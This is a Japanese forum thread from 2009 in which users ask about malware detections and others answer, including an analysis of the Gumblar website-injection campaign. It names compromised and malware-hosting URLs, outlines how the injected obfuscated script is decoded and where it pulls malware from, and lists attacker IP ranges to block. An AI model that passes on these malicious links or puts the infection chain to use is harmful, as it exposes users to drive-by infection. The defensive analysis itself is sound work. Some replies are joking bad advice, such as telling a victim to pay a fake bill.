�A・使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
　（*解凍ソフト、動画Player、Adobe Reader用パッチ、Mailソフト、Officeソフト、Sun MicrosystemsのJavaなど）
�B「Ad-Aware SE」 は保護機能を解除してから、「プログラムの追加と削除」からアンインストールして、
次の3つとも装備すること
http://pc11.2ch.net/test/read.cgi/sec/1239086455/8
・「a-squared Free 4.0」
・「Malwarebytes' Anti-Malware 1.35」
・「Avira AntiVir Personal - FREE Antivirus, Version 8

>>792
ウイルス名もわからない様ではどうにも…
そんな状態のPCはネットにつないではいけない。
漏れも駆除するよりリカバリに一票。
それから、Ad-Aware SEは3月31日で定義ファイルの提供が終了してます。
Lavasoftソフトを使うならAd-Aware AE（デフォルトで日本語有り）に。

Kido.ih
に感染しました
ｍｓと主なセキュリティサイトに繋がりません

>>798
>>1★質問用テンプレ★

>>792
リカバリしたくないのであればさらにspybot,clamなどを推奨。非常駐で使えるものは全て使ってみて下さい。
全て試して全く引っかからないか、引っかかってもあまりにも多ければリカバリしましょう。
駆除できてもパソコンの性能はガクンと落ちてしまいます。

いまどきAd-AwareとかSpybotとかClamなんて
アメリカ人でも使ってないからｗ

>>800
俺は使ったことないから分からないな・・

>>801
何使ってる？おすすめあったら教えて

手動削除中なのだが

l.cmd

コレってウィルス? 純粋なシステムファイル?
ググッてもヤフーでググってもいまいちピンとこないんで…

ランダムなファイル名の奴がごろごろしているのに
ファイル名だけでわかるかボケ
バッチだからメモ帳あたりで開いて読んで判断しろ

こっちで質問するようすすめられた。
マルチじゃないのでよろしく

勘違いかもしれないけど国民新党のホームページ乗っ取られたの？
さっきあちこちの政党のホームページ見てたんだけど国民新党のホームページ開いたらfirefoxが強制終了した。
不思議に思ってもう一回開いたらやっぱり強制終了。

不安になったのでパソコンのウィルスチェック、問題なし・・
aguse gatewayでhttp://www.kokumin.or.jp/opinion/を調査、問題なし・・
一体何故なのか分からない。ちなみに他のページ見たりするのには何の問題もない
不審なソフトの動きもない

勘違いかもしれないけどもしそういう情報があったら教えて。長レスしてスマソ

質問です
あるサイトでファイルをダウンロードしていたら、いきなりポップアップ画面で
「あなたも○○（自宅の住所。ローマ字で）に住んでるんでしょ？」
とか出てきました。
なぜ住所がばれたのでしょうか？　ウイルスですか？
ダウンロードしたファイルをウイルス検索しても、何も引っかかりませんでした
よかったらご教示ください

>>806
ＩＰからどこら辺に住んでるかとかは分かるよ？でも東京とか大阪とか大雑把にしか分からんでしょ？

アクセス情報【使用中のIPアドレス確認】
ttp://www.cman.jp/network/support/go_access.cgi

あとどのサイトか言ってくれなきゃ答えるにも難しい。
住所ってどのくらい正確に出てきたの？

ただのメッセンジャスパムだったりしてな

>>807
説明が足りなくてすいません
「同人こっとん」という同人誌のサイトです
「〜市」まで（出てきたのは市のみです）特定されていました
ごく最近パソコンをリカバリして、ウイルスとかにはやられてないと思うのですが……

>>809
使ってるブラウザは何？あとポップアップは表示しないように設定してる？

aguse gatewayでググってそこにそのサイトのＵＲＬぶちこんで調査、そこで問題なければ大丈夫なはず。

あとそんなに気にするほどでもないと思う。８０７で述べた通り基本的にＩＰはどこら辺に住んでるかの情報を含む。
住んでいる番地まで出たのなら話は別だが市町村程度までならそんなもん。
心配ならＰＧ２でも導入すべし。

便利なＩＰフィルタソフト、PeerGuardian２
http://ex24.2ch.net/test/read.cgi/pc2nanmin/1239572745/

どうしても心配ならもう一回わざと表示させて、その画面をプリントスクリーンでコピー、画像に貼ってどっかにアップしてみて。
それが一番確実。レスだけでは憶測でしか判断できん。

>>810
ありがとうございます
当のサイトをaguse Gatewayで見ようとしたのですが、
「画像を取得できませんでした」
というのがどのサイトを入力しても出ます
そのメッセージでぐぐってもヒットしないので、よかったら本来はどう表示されるのかを教えてもらえないでしょうか

まず、「ウェブ」で調べたところ、メインページを含めて色は変わりませんでしたが、
「ゲートウェイ」で例のポップアップ画面が出るページを張ったら色が紫になりました
こういう場合、そのサイトにいるだけでも危険ですか？
無知で申し訳ありませんが、もう少しお付き合いいただけるとうれしいです

>>811
安全なら緑、危険なら紫になる

一応あんたの言うページ調べたけど特に問題はないはず。入る前に幾つかのソフトで何重にもかけて調べたが問題なし
ページ情報にも悪意のあるもんは見当たらなかった。

ただ気になるのはそのポップアップ画面には一度も出くわさなかった。
firefoxでポップアップウィンドウブロックをしてるからだろうが自分から外すわけにはいかん。
手間をかけるがそのポップアップ画面が出るページのＵＲＬ貼ってくれ
（みんなに迷惑かけないようポップアップ画面が出るページのＵＲＬと明示して貼ってくれ）


あといるだけで危険かと言うと、その発想には指摘すべきことがある。
そもそも今も昔もセキュリティソフトとかはパソコンに侵入されたら意外と脆いものなのだよ。

もちろん最近では少しなら侵入されても対応できるようになってるが、それ以前に侵入させないことが一番重要なわけ。
だから危険なページにいるいないじゃなくて入る前に危険かどうか判断できることが大事になるわけよ
仮に開いてしまってもページ情報を読み込ませず遮断するよう設定しておくことは必須。usercash系なんかがいい例

さっき教えたaguse gateway、これ使えばかならの割合で危険サイト回避できるし、最近のアンチウィルスソフトなら
グーグル検索の段階で危険かどうかレベル分けして表示されるはず。そういうのを利用して最初から入らないのが正しい使い方になる
aguse gatewayを教えたのもそういう対策があるよってこと

つまり危険サイトに一度はいったらすぐ出ようとずっと居座ろうとあんまり変わらん。もちろん一刻も早く出るにこしたことはないが
本当に悪意のあるサイトだったら入った時点でアウト。

ただあんんたのいうサイトはそのポップアップ画面が出るページのＵＲＬ？踏まなきゃ平気だと思う。
さっきも言ったがとりあえずそのポップアップ画面が出るページのＵＲＬ貼ってみて

いろいろとありがとうございます　助かります

ポップアップが出るURLです
ttp://errors.servik.com/denied.htm

数秒待つと、下のほうに出てきます
ご迷惑をおかけしますが、よろしくお願いします

>>813アドレスでぐぐったらでてきた参考になるかは？

勇気が無くて見れない画像解説スレin半角Part526
284 ：/名無しさん[1-30].jpg：2007/09/24(月) 20:54:50 ID:sPWYzFuB0
errors.servik.com/denied.htm
おねがい

288 ：/名無しさん[1-30].jpg：2007/09/24(月) 21:42:19 ID:SQVwd+m+0
>>284
つまりはアダルトサイトの様です
その先は自己責任で

307 ：（コテハン）：2007/09/24(月) 23:32:52 ID:CJiqs2MF0
>>284
Error - Site cannot be accessed　などと表示されリンクがあり
リンク先は　McAfee SiteAdvisor　で微妙な判定の海外の出会い系サイトに逝きます
漏れの環境ではそこまではPC無害ですが一応注意

>>814
確かにぐぐると出てきますね
ポップアップの画面さえクリックしなかったら大丈夫だと信じます
あと、あまり行かないようにしますね
ありがとうございました

質問です。

公務員志望で，公務員予備校の資料を複数の学校からweb上で取り寄せたのですが
請求したところの資料が到着してから数日後に，資料請求してない予備校からも学校案内が届きました。

これはウィルスなどの影響でしょうか。それとも個人情報漏えいされているのでしょうか。
いずれにせよ詳しくその仕組みを教えていただければ幸いです。

うぉお・・・

ウィルスのせいでVistaから
「お前のコンピューター、正規品じゃねーぞカス」
「もうぜってー起動してやんねーｗ」
とか警告が・・・orz

>>816
今のご時世お互いに潰しあってる場合じゃない。予備校とて同じ。一つの予備校に資料請求すれば他の予備校にも情報が伝わる。
資料請求する場合はそういうことよくある。個人情報は漏洩しませんって言っても結局は業界団体にデータとして伝わるし

どうしても気になるなら資料請求したところに電話してみな。どうにかなるわけではないが一応迷惑だって意思を伝えるのは大事なこと

>>813
ブラウザは火狐にすべし。
2.0の頃は重かったが3.0あかなり使いやすい。
ポップ対策にも優れている

>>815
それはポップアップというより広告
Adblock Plusをfirefoxで使えばいい

【使用OS】　　　　　XP　SP3
【PCスペック】　　　 HP compaq nx9030 メモリ1.2Ｇ
【セキュリティソフトと年式】　　　　 ウィルスバスター２００９

ウィルスバスター２００９の履歴を見たところPAC_Generic 001が発見され削除されていました。
webメール検索が発見され自動で削除されていました。

発見されたところを見ると
ttp://bosamedia.org/getfile/Chaos.Queen.Ryoko.Scenario.4.exeとなっていました。
実に覚えが無いので恐らくインターネットを見てる時、どこか間違えてはいったのかもしれません。

このPAC_Generic 001をgoogleで検索したところ情報が４件しかなく情報がありませんでした。
このPAC_Generic 001とはどのようなものなのでしょうか？
お分かりの方、教えて下さい。

>>821
PAC_Generic 001？何だそりゃ？

こっちで聞いたら？
↓↓↓
セキュリティ初心者質問スレッドpart118
http://pc11.2ch.net/test/read.cgi/sec/1238849850/

>>821
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=Pak_Generic.001

ちなみにそのアドレスは有害。

>>821-823
http://pc11.2ch.net/test/read.cgi/sec/1238849850/281-284

>>823
一体いつそのアドレスに行ったのか全く分かりません・・
フリーソフトを探している時にどこかと間違えたのかもしれませんが・・
ちなみにどうやってそのアドレスが危険と分かったのでしょうか？
初心者ですいません

>>824
私も見てみました。破壊活動の有無がないというのは一応削除できたので大丈夫ということなのでしょうか・・

すいません。８２１＝８２５です。
書き忘れて申し訳ありませんでした。

>>821
そこから拾ったファイルをVirustotalスキャン

http://www.virustotal.com/analisis/0b3f4ecbdc630090ddbd52c026066d7f
黒ですね・・・

NortonSafeWebのレポート
http://safeweb.norton.com/report/show?url=bosamedia.org

>>827
拾ったファイル？最近ダウンロードしたものはほぼないはずですが・・
やはりフリーソフト探している時に偽者掴まされたのかもしれません。
わざわざありがとうございました。

あとそのＵＲＬは安全でしたか？自分の質問のせいで答えてくれた方が被害にあってしまっては立つ瀬がないので・・
アクセスした瞬間感染とかするＵＲＬでしたか？

>>828
＞アクセスした瞬間感染とかするＵＲＬでしたか？

とりあえず仮想環境で実験してみての結果、exeファイルをDLするページでアクセスした瞬間感染とかはない模様
あとVirustotalの結果一覧で821のファイルを検出できるベンダーはサイト開いた瞬間にブロックしてくれるのでご安心を

>>829
そうですか。質問した後に自分のせいで感染者が出たらどうしようと心配していたので良かったです。
Virustotal、私も使っていこうと思います。教えてくれてありがとうございました。

知り合いのメッセから変なURLが送られてきた
ttp://img*****.PhotoChekker.com/?user=〜
****は乱数くさい。user=以降は相手のメッセID、DSCから始まるカメラ画像っぽいファイルとなる
どうやら懐かしいIRCbotの亜種らしい
とりあえず面白半分で、捨てPC使って踏んでみたんだが感染してないっぽい？
少なくとも、レジストリに変な値が増えてるようなことはない
google先生に聞いたら日本語ではこれしか引っかからなかった
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325346163

潜伏先とか分かる人求む。どうやらメッセを最新にしてると感染しないくさいけど

質問です！
sandboxieでブラウザ動かしたらウィルス感染とかって起きないんじゃないでしょうか？
終わったら仮想領域空っぽにすれば問題ないんじゃないですか？

質問です
某スレで「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
URLをクリックしたらＩＥのタブが無限に増え続けてPCがフリーズしました
強制再起動かけたのですが、ウイルスに感染したのでしょうか？
OSはXPでavastは最新の状態です
URLを踏んだブラウザはスレイプニールですが、サイトを閉じたらIEが起動しました

>>833
某スレってどこ？それを最初に言わなきゃ？XPはＳＰ３にしてる？ＩＥはＩＥ８？
FireFoxでアドオンNoscriptいれてればそういうのは防げるよ。
上のことやって、用心のためAguse Gatewayってサイト通してチェックしな、それで全て分かる。

>833
＞「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
自分も試してみましたが、IEが沢山開くことや、PCがフリーズすることはありませんでした。

ただのブラクラなので…
ブラウザの設定だけで回避可能＆XPSP3とかIE7とかIE8とか全然関係なし

Fire「F」oxなんて書くアホはスルーで

これはjpgウイルスですか？
windowsを最新の状態にしておけば感染しないのでしょうか？
ttp://image.i-bbs.sijex.net/bbs/jk/1240316988578m.jpg

そういいつつ、それを貼るやつ

>>837
ウイルスリンク貼ったので、おまえを通報しますた

【使用OS】　「WindowsXP」
【Microsoft Update（MU）の状態】　「最新」
【使用セキュリティソフトとバージョン】　「カスペルスキーインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「Yes」
【スパイウェア対策ソフト】　「カスペの機能+Adaware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「Yes」
【ルータの有無】　「あり」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「MultiPacked.Multi.Generic」

ググっても日本語のページが無く、よく判りません…。
xfireというゲーマー用のツール&ページがあるのですが、そこでリアルタイム配信を見る為に
配信URLを開いたら、悪意の含まれるプログラムと言い上記の　MultiPacked.Multi.Generic　というものが
マルウェア？としてひっかかります。
駆除をしてみるのですが、駆除できないようです。
ログには以下のように出ています。

C:\DOCUMENTS AND SETTINGS\ユーザー名\LOCAL SETTINGS\APPLICATION DATA\DYYNO RECEIVER\dyyno.qtl/Edit
Dyyno P2P Receiver Application
駆除できません: MultiPacked.Multi.Generic
処理をスキップしました

DYYNOというのは、配信を見る為に必要なプラグインです。

むしろ、このプラグインがやばいのでしょうか…
MultiPacked.Multi.Genericとは何者なのでしょうか。

どうぞよろしくお願いします。

>>840
Genericなら
疑わしい段階でマルウエアとして確認されたわけではない。
virustotalでほかのベンダーが検出しているか調べるとか、
ｈｔｔｐ://www.kaspersky.co.jp/の最下部「新しいウイルスをお知らせください」
から検体を送るとかすると良いかと。

暫定的に安全性は落ちるがプロアクティブディフェンス切っておけば？

カスペルスのオンラインスキャンを試したところ、
jane styleのログが感染の疑いありと判断されました。
この場合、スレ一覧からログ削除を選択すれば解決するのでしょうか？

>>842
こっちで聞け

セキュリティ初心者質問スレッドpart118
http://pc11.2ch.net/test/read.cgi/sec/1238849850/

確かbitdefenderだったと思うんですが、
Knoppixみたいに、1CDでWindows立ち上げずに
ウィルススキャンするのがあったと思うんですが
どこでしょうか？フリーじゃなかったですかね？

BitDefender
AntiVir
Avast
AVG
F-PROT
どれでもできるよ

>>845
そのbootdiscがどこにあるか知りたかったのですが・・・
調べてたらUltimate Boot CDというのを見つけたので使ってみます。
ただウィルス定義が古そうですが。。

たびたびすんません、bootdiskである必要がありませんでした。
XPをセーフモードで立ち上げる場面で
「コマンドライン」にすれば、CD上のDOSスキャナでスキャン出来ますよね。
DOSスキャナを焼いてみます。

コマンドライン版とか使えばお手軽だね

【使用OS】　「XPHOMESP3」
【Microsoft Update（MU）の状態】　「基本的に最新（ＩＥは６）」
【使用セキュリティソフトとバージョン】　「ノートンインターネットセキュリティ2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「yes」
【ルータの有無】　「yes」

ここ数日、PF使用量とieのメモリ使用量が増大します。
普段ならPC起動時350程度のＰＦ使用量。ネットを数時間やっても800~1GB程度です。またieの使用メモリ量もそれほ
ど多くありません。ですが、ここ数日ieを起動して数クリック移動しただけでPFが1GBを超え、さらに使い続けると１時間も使用してない

にもかかわらず、PFが2GB以上行きます。ieの使用メモリ量もありえない量に増大しており

↑の続きです

例・通常
・2chを開く　　　　　　　　IEXPLORE.EXE　　　65.000KB
・ミギクリ別ウインドウで開く　 IEXPLORE.EXE　　　75.000KB
・ミギクリ別ウインドウで開く(その２）　 IEXPLORE.EXE　　　85.000KB

・2chを開く　　　　　　　　IEXPLORE.EXE　　　65.000KB
・ＵＲＬクリック　　　　　　　　 IEXPLORE.EXE　　　65.000KB
・ＵＲＬさらにクリック　 IEXPLORE.EXE　　　70.000KB

今現在
・2chを開く　　　　　　　　IEXPLORE.EXE　　　65.000KB
・ミギクリ別ウインドウで開く　 IEXPLORE.EXE　　　150.000KB
・ミギクリ別ウインドウで開く(その２）　 IEXPLORE.EXE　　　400.000KB

・2chを開く　　　　　　　　IEXPLORE.EXE　　　65.000KB
・ＵＲＬクリック　　　　　　　　 IEXPLORE.EXE　　　150.000KB
・ＵＲＬさらにクリック　 IEXPLORE.EXE　　　400.000KB

ちなみに数十分もすると2000.000KBとか行きます。勿論、ここ数日だけです

明らかに消費量がおかしいのですが（PFとIEの消費量）何か考えられる原因はありますか？
たしかに動作も重いような気もするのですが…

スペック
Core 2 Duo プロセッサー T8300 4GB(2GBx2) GeForce 8400M GS 128MB

【使用OS】　「Vista Ultimate」
【Microsoft Update（MU）の状態】　「自動（出たらすぐに導入）」
【使用セキュリティソフトとバージョン】　「OneCare」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「yes」
【スパイウェア対策ソフト】　「Onecare」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「yes」
【ルータの有無】　「有り」

あらゆるプログラムを起動する歳にOneCareが「インターネットへの接続を許可しますか」というポップアップを出すようになりました。
インターネットにアクセスしないであろうソフトを起動しても出てきます。

何かのウィルスかワームで、レジストリをいじってあらゆるソフトの起動と同時に活動するやつがいた記憶があるのですが、
そいつにやられているのでしょうか？

>>849
【使用セキュリティソフトとバージョン】　「ノートンインターネットセキュリティ2008」 　←　2009の方が軽いよ

★最新版 Norton Internet Security 2009 への無償アップグレード
http://pc11.2ch.net/test/read.cgi/sec/1239086455/

＞ieの使用メモリ量もありえない量に増大
これはブラウザの設定&有効になっているアドオンの数&サービスの稼働状況　に起因するものだと思う
キャプチャ画像をセキュリティ初心者質問スレッドpart118　にUPすれば◆N9P3SuvBPoなどがアドバイスしてくれるだろう

>>851
http://pc11.2ch.net/test/read.cgi/sec/1239086455/l50
・「a-squared Free 4.0」
・「Avira AntiVir Personal - FREE Antivirus, Version 8 （*9は非常駐化×）」

この2つをインストール > Update > フルスキャン　して感染があるかどうか？調べてみるといいよ

OneCareにはソフトウェアエクスプローラ的なものは無かったかい？
あれば手っ取り早く調べられるんだが

>854
OneCareにはないですね。WindowsDeffender側のを起動させてみたんですが、とくに怪しいようなのはなかったてす。
探し方のコツとかありますか?

「Process Explorer」や「Process Monitor」のことかな？
次々とexeファイルに感染を拡げるタイプのウイルスには無意味

>>852
ありがとうございます
とりあえず2009にして見ます（どうも2007だったようです（汗

>ブラウザの設定&有効になっているアドオンの数&サービスの稼働状況　に起因する

分からないでもないんですが、その設定が突然変わったりすることはあるんでしょうか？

>>852
なぜか2009に更新したら収まった気がします
ありがとうございました

数日様子みておかしいようでしたらまたきます

いまでもPCの知識に乏しいのですが、始めてすぐの頃にファイルをDLしたらスクリーンセーバーで
なんとなく使っていたんですが、".scr"という拡張子の場合偽装ウィルスである可能性が高いと聞いて
自分が開いたファイルはウィルスだったのか気になっています
偽装ウイルスの場合、中身はウイルスだけでデスクトップで普通に使用できるスクリーンセーバーは入っていないものなのでしょうか
p2pはやっておらず、セキュリティソフトのウイルス検索では何も発見されていません
どうかみなさんのご意見お聞かせください

>>859
自分で調べろ
「VirusTotal.com」 （37社のスキャナでのファイルスキャンサービス *SSLにチェックして送信 *圧縮ファイルの状態でOK）

>>859
scrはスクリーンセーバーの拡張子。(まあ中身はexeと同じ)
だからスクリーンセーバのプログラムの拡張子が、scrなのは当たり前。

>>860>>861
さっきオキャンしてもらったら、ウィルス反応はありませんでした
1つのソフトでチェックするよりも少し安心しました
ありがとうございました

↑
ageてすみません

【使用OS】　「ＶＩＳＴＡＨＰ」
【Microsoft Update（MU）の状態】　「最新」
【使用セキュリティソフトとバージョン】　「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「されてる」
【スパイウェア対策ソフト】　「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「なってる」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「Adware-GameSpyArcade」
毎回スキャンのたびに表示されるからウイルスとかじゃないと思ってるんですが、
毎回隔離するのも面倒なので、検出されたものが危険なのか知りたいです。
一応ぐぐったり調べましたが具体的な回答が見つからないため質問に来ました。

>>864
グーグル検索→一番上
に具体的にあったが
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gamespyarcade.html

レジストリも削除が必要

>>865
ありがとうございます。
しかしPage Not Found

>>864
GameSpy Arcadeに関する何か使ってませんか？
GameSpy ArcadeはGameSpy Industries社製の汎用マッチメーキングソフトであり、

GameSpyArcade自体がアドウエアですので、必ず検出されます。（持っていれば

http://crusherfactory.net/~yas_/000256.php
このサイトavgでウィルスの反応が出たけど、どの程度やばい、
後何か検査とかしたほうがいい？

そういうのを直リンするとかバカなの?

踏んだら危ないものを普通に貼るのはルール違反だぞ？被害者が増えたらどうする。
どうしても貼る場合はきちんと危険だってことを明記するのが礼儀。

とりあえずaguseだとウイルス反応はないな

ソースをコピペしてVirusTotalにあげたが
AntiVir , Authentium , Avast , F-Prot , GData , McAfee-GW-Edition , Norman
で反応した。

検出したのをググってみたが、普通に常駐で反応し削除したのであれば問題ないかと。
心配なら、フルスキャンすればいい。

>>868
セキュリティソフト何いれてるの？

心配なら他のオンラインスキャンもやってみなよ

>>870
一応ウィルス反応あったって欠いたけど、h抜きはするべきだったね。
>>873
avastだよ。

>>872
削除できませんでしたと出たので、どうかと思ったけどこれはavaスレで聞くよ。

>>867
結構ＦＰＳゲームやるんですがそれですかね
ウイルスじゃないなら信用を押して検出しないようにしたいのでそこらへん教えてほしいです
レジストリから削除しちゃったんですけど、またプレイしたら入るんでしょうし

さっきYahoo!で「ウェルネス」ってサイトを開こうとしたらavastが反応しました。医療や介護関係のまじめなサイトで社会に貢献しているサイトなのですが感染してるのでしょうか？
電話したのですが休みのようです。
他のソフトでも反応がでたら休み開けに再度、連絡してみようと思ってます。

そのアドレスを「ht」を省いてここに書いてくれ。
それと、サイト自体が改ざんされてマルウェア仕込まれるなんてよくあること。

>>877

つtp://www.wellness.co.jp/

です。ヨロシクお願いします。

>878
そのサイトのソース（問題と思われるコードだけ）をメモ帳にコピペしたものを、
virustotalに投げて見ました。3社が反応してくれました。（以下URL参照）

ttp://www.virustotal.com/jp/analisis/4c1586f687ca86a674d0d7092f475fe3

そのサイトには、どっかの悪質なサイトにリダイレクトするスクリプトが仕込まれてるってさ。
砂箱経由でFirefoxからアクセスしたけど、特に何もなかったが・・・

>>879
>>880

ありがとうございます。乗りかかった船です。休み開けに管理者に連絡してみます。改ざんだとしたら許せないですね。

>>878-881
それ、変なスクリプト仕込まれてて、今検出可否スレで話題になってる gumblar.cn に飛ばされるぞ。
　http://pc11.2ch.net/test/read.cgi/sec/1235459712/690

VirtualPCで踏んでみたけど、俺の所はマルウェアのid2とid3が落ちてきた。

てか、genoの時と同じで、今の所スルーするセキュリティソフトが多いんで、マジでアクセスしない方が良い。

>882
その変なスクリプトというのが『@や英数字』なんですよね。
俺の環境ではIE直踏みでも大丈夫だけど、素人は興味本位でアクセスしない方が良い。

>>883
そう。Javascriptのreplaceとunescapeを使って難読化されている。

@を%に置き換えてunescape関数を実行すると、元のスクリプトが出てくる。（普段はブラウザが勝手にやってる）
※ 俺はJavascriptに詳しい訳じゃないので、逆にその程度しかわからんが。

Firefox＋Noscriptなら許可しない限り実行されないから問題ないけど、IEだとごく普通に勝手に実行されてマルウェアが落ちてくる。
Acrobat Readerや　Flash Playerが古いままだと、現時点ではスルーするセキュリティソフトがほとんどだから、この時点でアウト。

あー、気持ち悪いからOS入れ直してくるわ。

Firefox＋Noscriptを使ってはいるけど
ウェルネスなんかの真面目なサイトだと普段覗いてれば
許可出してしまいがちだから怖いなぁ

>884
＞@を%に置き換えて
頑張って手動でやってみようとしたけど
海外のエロサイトリンクに***%2f***というのがよく出るので、@2fが / だということしか分かりませんでした。

>886
極普通の真面目なサイトが不正アクセス受けて改ざんされて
安全なサイトだからつい許可してしまったら感染…
俺らは一体何を信用すればいいの？
という事態に成りかねないですよね。

>>887
手動でやるのは無理なので、こういうサイトを利用するのでし。
　ttp://www.broadband-xp.com/hidesource/escape.html

今回のだと、ソースの中のunescapeの部分に注目して、あとreplase部分から@→%の置換があることに当たりを付けて、
1) unescape関数の中身('@〜'まで）をテキストエディタにコピー
2) エディタ上で@を%に置換
3) 置換後のテキストを、上記のサイトの右側の欄に貼り付け
4) unescape関数でデコード　のボタンを押す

そうすると、左側に元のスクリプトが表示されます。今回のだと、前の方でOS判定をやって、
最後の所で src=//gumblar.cn/〜　でマルウェアを落とすようになっていることがわかるのです。

idがJScriptエンジンのバージョンだって事は分かった。
ID付けてアクセスしたらスクリプトが落ちてきたよ。

ttp://www.virustotal.com/jp/analisis/e90aad75500f07482cb4ef925a55f9cc

>888
やってみたところ、ちゃんとできました。
@のところを%に置き換える作業がめんどくさかったですけどね。
勉強になります…

>>886
俺もFirefox＋Noscript使ってる。
面倒だけど許可したい場合も毎回一時的な許可に留めた方が安全か。

つーか普通のサイトで感染するなんてなんつー世の中だよ

>>891
毎回許可にしようとも、そのときに改竄されてるとアウツなのよね。
まともなサイトが改竄されてるともうどうしようもないよね…。

事後情報です。

検出可否スレにも書きましたが、gumblar.cnが、Googleの攻撃サイトに登録されました。
GoogleのSafe Browsing APIを使用しているブラウザ（Firefoxやchromeなど）では、アクセスブロック（攻撃サイトの表示）が行われるようになっています。

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/

2009年5月3日 10:20時点で、既に308個のドメインを感染させているそうですので、皆様も注意お願いします。

乙。

ライセンスの電話認証めんどくさ。

Firefoxで踏んでみたけど、今んとこ問題ない

危険IPのブロック（Firewall登録／IPベースのブロッカーの導入）

IDS/IPS/Firewall
BLOCK : 94.229.65.160 - 94.229.65.191

めんどくさいんで、まとめてブロック
BLOCK : 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)

Browser/Hosts ブロック:
BLOCK : gumblar.cn

ありがとう。
うちのルータのIPフィルタはマスク長入れないといけないので
まとめてブロックは初心者としては有難いです。

http://www.freaksstore.com/

フリークスストアのサイト踏んだら
ノートン先生がトロイ検出したんだが…

>>898
>>878のと同じ。

>>899
サンクス

>>878,898
gumblar.cnの感染サイト追加。http://pc11.2ch.net/test/read.cgi/sec/1129098218/300　より転載

ttp://www●nenrei-hayami●net/

や、これはキリがないな。時間と共に増える一方だ。ちょうど連休中で管理者不在のサイトも多そうだし。
つか、genoの時も思ったけど、こいつら簡単に改竄されすぎじゃねえのかと．．．

せっかくの休日をウィルスでやられたんじゃたまったもんじゃないな

危険IPのブロック（Firewall登録／IPベースのブロッカーの導入）
現在のまとめ: 2009.05.03 予防措置も含めて

Host Flesh
58.65.232.0 - 58.65.239.255

Chunghwa Telecom Co.
61.219.39.0 - 61.219.39.255

CHINA RAILWAY TELECOMMUNICATIONS CENTER
61.235.117.0 - 61.235.117.255
61.237.236.0 - 61.237.236.255

XS4ALL Internet BV (zief.pl)
83.68.16.0 - 83.68.16.255

UK Dedicated Servers Limited
- (gumblar -- Russian )
94.229.64.0/20 (94.229.64.0 - 94.229.79.255)

ZLKON
94.247.2.0 - 94.247.3.255

CHINA UNICOM
211.90.0.0 - 211.97.255.255

LU-ROOT
212.117.160.0 - 212.117.191.255

CHINANET
218.90.0.0 - 218.94.255.255

http://ssupdater.com/modules/Forums/index.php?showtopic=2502
http://ssupdater.com/modules/Forums/index.php?showtopic=1810
http://ssupdater.com/modules/Forums/index.php?showtopic=3746

>904
海外のアンチウイルスやアンチスパイウェアの検出ランキングです。
古いです。

すみません、質問です。
Ｓｙｍａｎｔｅｃ　Ｓｅｃｕｒｉｔｙ　Ｃｈｅｃｋを通したら
C:\WINDOWS\system32\Tools\Hide.exe は　Adware.Gen に感染していると言われました。
これはどうすればいいでしょうか？

マジレスですご返答お願いします。

アダルトサイトからの請求画面がパソコン上に出ます。消してもしつこく出てきます。
間違いなく架空請求です。何か止める方法はありますか？

宜しくお願いします。

請求どおり払う。

・SUPERAntiSpywareやmalwarebytes' anti-malwareを試してみる。
・OSクリーンインストール。
・窓からPCを投げる

909さんはじめまして907です
手順を追って丁寧に教えてほしいです
お願いします

まずPCをシャットダウンします。
シャットダウンが完了したら、接続されている線を全て抜きます。
全て抜き終わったら窓を開け、下に人が居ないのを確認したら窓から勢いよく放り投げるます。
PCが落ちたのを確認したら近くの家電量販店に行き、適当なPCを買ってきます。
これで元通りになると思います。

explzを本サイトで落そうとして、ダウンロードをクリックしたら、アンチウィルスソフトがブロックした。
ウィルス入ってるのかなぁ。。。

>>912
DECLHA.EXEが誤検出されるけど無害

>>913
何が誤検出されてるか調べるのは、どうすればわかるの？

お使いのアンチウイルスソフトのスレで聞いてください

>>905
新しいのください

ttp://www.horseman-club.com
AVASTくんがトロイがいると怒ってます
例のヤツでしょうか

>>917
見てみましたが、その通りです。

そのページの中にあるswfobject.jsとimageReplace.jsの２つのファイルの中に、gumblar.cnへのリンクが埋め込まれています。

つーか、まだgumblar拡散してんのか．．．流石GW中、どこも管理者不在かねぇ。　ある意味明日が楽しみだな。

>916
それは904に聞いてください。

>917
そのサイトのトップのソースをまるまるvirustotalに掛けて見たんですけど、
ひとつも検出できたソフトはありませんでした。
ちなみにそのサイトのどこでAvastが反応ありましたか？

>>919
>918の通り、そのページのソースそのものではなく、呼び出しているスクリプトファイルの中に埋め込まれています。

swfobject.jsとimageReplace.jsの2つをテキストエディタで開けば、毎度おなじみの難読化コードが出てきますよ。

>918
>920
どおりでトップページに無いわけでした。
/imageReplace.jsや/swfobject.jsのソースを確認したところ、
問題のコードが下の部分にありました。
917すいません…

>>918
ありがとうございます
TOPページのソースを見てもちょっとわからなかったので納得です

普通の人は閲覧しないであろうサイトですが
ポイントサイトにリンクがあったので見ちゃった人多いかも…

>>921
いえいえ

どっかに、沢山ウィルスが置いてあるサイトってない？

>>923
eicarでも使っとけカス

緊急の対処法を教えてください。
昨日から今日にかけて、大量のMAILER_DAEMONを受信しました。
所有する独自ドメインで管理しているしているメールアドレスからどうやら発信しているようです。

[email protected]

このxxxの部分が自分の管理していない見覚えのないアカウントになっています。
まだウイルスかは分からないですが、とりあえず緊急処置を教えていただけませんか？
スレチだったらごめんなさい。

一瞬、冷や汗がでましたが自己解決できました。
メールヘッダを調べたことろ、誰かが自分のアドレスを偽装して送信していたみたいです。
板汚してすいません。

こんな程度の奴がドメイン持つなよ…

>>867
何そのコピペ解答
